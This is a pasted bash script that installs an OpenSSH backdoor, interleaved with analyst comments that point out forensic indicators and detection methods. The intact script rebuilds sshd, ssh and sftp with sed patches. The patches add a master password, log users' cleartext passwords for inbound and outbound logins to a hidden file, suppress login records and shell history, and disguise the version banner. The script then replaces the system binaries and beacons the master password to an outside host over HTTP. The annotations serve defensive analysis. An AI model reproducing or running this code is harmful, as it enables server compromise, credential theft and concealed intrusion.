adamchilcott

pwned.sh

Dec 22nd, 2018
  1. #!/bin/bash
  2. #Backdoor 2019 [Qadimoun]
  3.  
  # [analysis] Host preparation stage. Everything here needs root and leaves
  # host artifacts a responder can look for: IPv6 disabled through sysctl for
  # both the "all" and "default" interface classes, /etc/resolv.conf overwritten
  # with a single resolver, and a compiler toolchain installed on the host.
  4. sysctl -w net.ipv6.conf.all.disable_ipv6=1
  5. sysctl -w net.ipv6.conf.default.disable_ipv6=1
  6.  
  7. # Set global recursive dns for non-failure backdoor tools hosts resolution.
  8. echo '[Q] Resetting resolv.conf'
  # [analysis] '>' truncates the file: any existing resolver/search entries are
  # lost, so an unexpected one-line resolv.conf is a visible side effect.
  9. echo 'nameserver 8.8.8.8' >/etc/resolv.conf
  10. # Install Gcc and reqs..
  # [analysis] Both yum and apt-get are invoked without testing which one is
  # present. Package-manager logs showing gcc/make and OpenSSL/zlib development
  # packages appearing on a production server are worth correlating with the
  # other artifacts this script creates.
  11. yum install gcc make -y
  12. apt-get install gcc make -y
  13. yum install gcc openssl-devel libz libz-devel -y
  14. apt-get install openssl-dev libz libz-dev -y
  15. # Let the fun start
  # [analysis] Host profiling: distro name (first word of /etc/issue), CPU count
  # (highest "processor" index in /proc/cpuinfo plus one), a memory figure taken
  # from the second line of `free -m`, and a summed `df --total` column scaled
  # by 1024*1024 and labelled "GB". These values are only used in the HTTP
  # request at the end of the script.
  16. DIST=`cat /etc/issue |head -1 |cut -d " " -f 1`
  17. CPU1=`cat /proc/cpuinfo |grep processor |tail -1 |cut -d ":" -f 2 |cut -d " " -f 2`
  18. CPU2=`echo 1`
  19. CPU=$((CPU1 + CPU2))
  20. MEM=`free -m |head -2 |tail -1 |cut -d ":" -f 2 |sed -n '/ /s/  */ /gp' |cut -d " " -f 2`
  21. STORAGE=`df --total |sed -n '/ /s/  */ /gp'|cut -d " " -f 2 |grep -v blocks |awk '{s+=$1} END {print s}' |awk '{ byte =$1 /1024/1024; print byte "GB" }'`
  22.  
  # [analysis] PASSWORD is a random decimal number; it is later written into
  # patch.h as PATCHPASS, i.e. the value the patched sshd compares every login
  # password against. SNIFFILE is the path the patched binaries append captured
  # credentials to -- /usr/local/.logs is a host indicator for this sample.
  23. PASSWORD=`shuf -i 1-10000000000000000000 -n 1`
  24. SNIFFILE='/usr/local/.logs'
  25. #curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST
  26.  
  # [analysis] BACKDOOR_INC is the generated header; FILES lists the OpenSSH
  # source files that get modified. HOST is a plain-HTTP source mirror, so the
  # tarball fetch is visible in egress/proxy logs.
  27. BACKDOOR_INC="patch.h"
  28. FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h"
  29. #HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/"
  30. HOST="http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/"
  31. OK="OK"
  32. FAIL="Failed"
  33.  
  # [analysis] Leftover interactive prompts. Both PASSWORD and SNIFFILE were
  # assigned non-empty values earlier in the script, so the two `-z` branches
  # below are not expected to run in this paste as written.
  34. echo "ENJOY..."
  35. if [ -z $PASSWORD ]; then
  36.     echo $PASSWORD | md5sum |cut -d " " -f 1
  37. fi
  38.  
  # [analysis] Alternate credential-log location: /usr/local/include/uconf.h,
  # created and made readable and writable by "other" users. Worth including in
  # a sweep alongside /usr/local/.logs, since a variant may use this path.
  39. if [ -z $SNIFFILE ]; then
  40. echo -n ">>> logfile path: /usr/local/include/uconf.h"
  41. SNIFFILE="/usr/local/include/uconf.h"
  42. touch "/usr/local/include/uconf.h"
  43. chmod o+wr "/usr/local/include/uconf.h"
  44. echo "Do not remove /usr/local/include/uconf.h"
  45. fi
  46.  
  # [analysis] SSHDCONFIG is hard-coded to /etc/ssh; it is later passed to
  # ./configure as --sysconfdir so the rebuilt sshd reads the existing
  # configuration and host keys location.
  47. echo -n "checking for sshd_config...    "
  48. SSHDCONFIG="/etc/ssh"
  49. if [ -f $SSHDCONFIG/sshd_config ]; then
  50.         echo "$OK  ($SSHDCONFIG)"
  51. fi
  52.  
  53. if [ -z "$SSHDCONFIG" ]; then
  54.         echo "$FAIL"
  55.         echo -n ">>> sshd_config path: "
  56. fi
  57.  
  # [analysis] Tool discovery. The script exits if no ssh client is on PATH or
  # if neither curl nor wget is available.
  58. # ssh
  59. echo -n "checking for OpenSSH binary... "
  60. SSH=$(which ssh)
  61. if [ -z "$SSH" ]; then
  62.         echo "$FAIL"
  63.         exit
  64. fi
  65. echo "$OK  ($SSH)"
  66.  
  67. # wget
  # [analysis] curl is preferred (flag -O); wget is the fallback (flags -qc).
  # The variable is named WGET in both cases.
  68. echo -n "checking for wget/curl binary... "
  69. WGET=$(which curl)
  70. WGET_FLAG="-O"
  71. if [ -z "$WGET" ]; then
  72.         WGET=$(which wget)
  73.         if [ -z "$WGET" ]; then
  74.                 echo "$FAIL"
  75.                 exit
  76.         else
  77.                 WGET_FLAG="-qc"
  78.         fi
  79. fi
  80. echo "   $OK  ($WGET)"
  81.  
  82. # check ssh version
  # [analysis] The installed client's `ssh -V` banner is parsed so the rebuild
  # uses the same upstream version as the packaged OpenSSH. SSH_VERSION is the
  # text before the last comma, SSH_DISTRO its second whitespace-separated word
  # (presumably a distribution suffix -- confirm against a real banner), and
  # SSH_SHORT_VERSION the part after "OpenSSH_" up to the first space.
  83. echo -n "checking OpenSSH version... "
  84. SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/')
  85. SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}')
  86. SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//')
  87. if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then
  88.         echo $FAIL;
  89.         exit
  90. fi
  91. echo "   $OK  ($SSH_VERSION)"
  92.  
  93.  
  # [analysis] Fetches openssh-<version>.tar.gz from HOST over HTTP into the
  # current working directory, unpacks it and changes into the source tree.
  # Forensic artifacts: the tarball, the extracted openssh-<version>/ directory,
  # and a .bak copy of every file named in FILES inside it.
  94. # get ssh
  95. OPENSSH=$(echo openssh-$SSH_SHORT_VERSION)
  96. echo "downloading source..."
  97. $WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz &&
  98. #echo "          $OK" &&
  99. echo -n "extracting tarball..." &&
  100. tar xzf $OPENSSH.tar.gz &&
  101. echo "          $OK" &&
  102. cd $OPENSSH
  103.  
  104.  
  105. # check file sanity
  # [analysis] Stops if any file to be patched is missing; otherwise keeps the
  # pristine copy as <file>.bak next to it.
  106. echo -n "checking file sanity..."
  107. for FILE in $FILES; do
  108.         if [ ! -f $FILE ];then
  109.                 printf "$FILE not found.\n"
  110.                 exit
  111.         fi
  112.         cp $FILE $FILE.bak
  113. done
  114. echo "        $OK"
  115.  
  # [analysis] Generates patch.h with two string constants -- PATCHPASS (the
  # master password) and SNFLOG (the credential-log path) -- plus the global
  # flag patch_on. Both strings are compiled into the rebuilt binaries as
  # literals, so the log path is likely recoverable from a suspect sshd/ssh
  # with a strings-style inspection (confirm on the actual binary).
  116. echo "generating patches..."
  117. BACKDOOR_BUF=\
  118. "#ifndef __HAVE_PATCH_H
  119. #define __HAVE_PATCH_H
  120. #define PATCHPASS \"$PASSWORD\"
  121. #define SNFLOG \"$SNIFFILE\"
  122. int patch_on;
  123. #endif"
  124. printf "$BACKDOOR_BUF" > $BACKDOOR_INC
  125.  
  126.  
  # [analysis] Source modifications, applied with sed into <file>.tmp and then
  # moved over the originals. The "OK" messages are printed before each sed
  # runs and do not reflect its result. Effects on upstream OpenSSH code are
  # inferred from the inserted text only; the patched files are not on this page.
  127. # patch files
  # [analysis] auth.c: inserts `if(patch_on) return;` after text matching
  # "Accepted" -- apparently meant to skip the success log entry for
  # master-password logins. Defender impact: sessions with no matching
  # "Accepted" line in the auth log.
  128. echo "  patching auth.c...           $OK"
  129. sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp
  # [analysis] loginrec.c: makes login_write return 0 immediately when patch_on
  # is set -- presumably suppressing login accounting records for such sessions.
  130. echo "  patching loginrec.c...       $OK"
  131. sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp
  # [analysis] auth-passwd.c: (1) resets patch_on, then returns success when the
  # supplied password equals PATCHPASS, before the normal checks; (2) rewrites
  # the PAM and crypt success paths so every successful legitimate password
  # login appends "From: <remote ip> - <user>:<password>" to SNFLOG in clear
  # text. Any account that logged in by password while this sshd was running
  # should be treated as having a disclosed password.
  132. echo "  patching auth-passwd.c...    $OK"
  133. sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp
  # [analysis] session.c: for patch_on sessions, HISTFILE=/dev/null is added to
  # the session environment, so no shell history is kept for them.
  134. echo " patching session.c...             $OK"
  135. sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp
  # [analysis] sshconnect1.c / sshconnect2.c (client side): passwords typed into
  # the replaced ssh client for outbound connections are appended to SNFLOG as
  # "To: <ip> - <user>:<password>", except when the password equals PATCHPASS.
  # Credentials for other hosts reached from this machine are therefore also
  # in scope for rotation.
  136. echo "  patching sshconnect1.c...    $OK"
  137. sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp
  138. echo "  patching sshconnect2.c...    $OK"
  # [analysis] LINENUMBER selects one specific occurrence of the
  # packet_start(SSH2_MSG_USERAUTH_REQUEST) call by line number (via head -3 |
  # tail -1) and only that line is rewritten.
  139. LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1)
  140. sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp
  # [analysis] includes.h: pulls the generated patch.h into the build.
  141. echo "  patching includes.h...    $OK"
  142. sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp
  143.  
  144.  
  145. # move files
  146. for FILE in $FILES; do
  147.         mv $FILE.tmp $FILE
  148. done
  149. echo "done."
  150. echo "building source..."
  151.  
  # [analysis] Prints the detected version, config directory and the master
  # password to stdout, so the password also ends up in any captured terminal
  # output of the install run.
  152. echo
  153. echo Variables:
  154. echo " \$SSH_VERSION  =  $SSH_VERSION"
  155. echo " \$SSHDCONFIG   = $SSHDCONFIG"
  156. echo " \$PASSWORD     = $PASSWORD"
  157.  
  # [analysis] Banner matching: the portable-version string from version.h gets
  # SSH_DISTRO appended, so the rebuilt binaries report the same version text
  # as the packaged ones. Comparing `ssh -V` output or the server banner is
  # therefore not a reliable way to spot the replacement; compare file hashes
  # or use package verification instead.
  158. SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}')
  159. if [ -z $SSH_DISTRO ]; then
  160. echo "Keeping current version.h"
  161. else
  162. echo "SSH Distro: $SSH_DISTRO"
  163. sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp
  164. rm -rf version.h
  165. mv version.h.tmp version.h
  166. fi
  167.  
  # [analysis] Build stage. USEPAM is read from the live sshd_config, and the
  # GSSAPICleanupCredentials grep only prints its match. KERB is never assigned
  # in the visible script. Both branches of each test leave OPT_PAM / OPT_KERB
  # empty, so the printed "with/without" messages do not describe the options
  # actually passed: ./configure receives only --sysconfdir. A sshd rebuilt
  # without the distribution's configure options may behave differently from
  # the packaged one (for example for PAM-dependent logins) -- a possible
  # detection signal; confirm on the host.
  168. # start build
  169. USEPAM=`cat /etc/ssh/sshd_config|grep -i usepam`
  170. cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials
  171. if [ -z $USEPAM ];then
  172. echo "Configuring --with-pam"
  173. OPT_PAM=""
  174. else
  175. echo "Configuring without PAM"
  176. OPT_PAM=""
  177. fi
  178. if [ -z $KERB ]; then
  179. echo "Configuring --with-kerberos5"
  180. OPT_KERB=""
  181. else
  182. echo "Configuring without kerb5"
  183. OPT_KERB=""
  184. fi
  185. echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB"
  # [analysis] Only the ssh, sshd and sftp targets are built.
  186. ./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd sftp
  187.  
  # [analysis] Install and report stage. The freshly built sshd, ssh and sftp
  # are moved over the system binaries and sshd is restarted; these steps are
  # not conditional on the build above having succeeded.
  # Detection: the replaced files no longer match the package database, so
  # package verification (e.g. `rpm -V openssh-server openssh-clients`, or
  # `debsums openssh-server openssh-client` / `dpkg --verify`) and file
  # integrity monitoring on /usr/sbin/sshd, /usr/bin/ssh and /usr/bin/sftp
  # should flag them, as will changed mtimes and hashes.
  188. printf "patched OpenSSH ready.\n"
  189. mv sshd /usr/sbin/sshd
  190. mv ssh /usr/bin/ssh
  191. mv sftp /usr/bin/sftp
  192. service sshd restart
  # [analysis] Beacon: one plain-HTTP GET to patti-taylor.co.uk/get.php carrying
  # CPU count (c), memory (m), storage (s), distro (d) and the master password
  # (p) in the query string. Network indicator: outbound requests from servers
  # to this host/path with those parameters in proxy, DNS or flow logs. Because
  # the request is unencrypted, the password is also exposed to anything on the
  # network path.
  193. curl 'http://patti-taylor.co.uk/get.php?c='$CPU'&m='$MEM'&s='$STORAGE'&p='$PASSWORD'&d='$DIST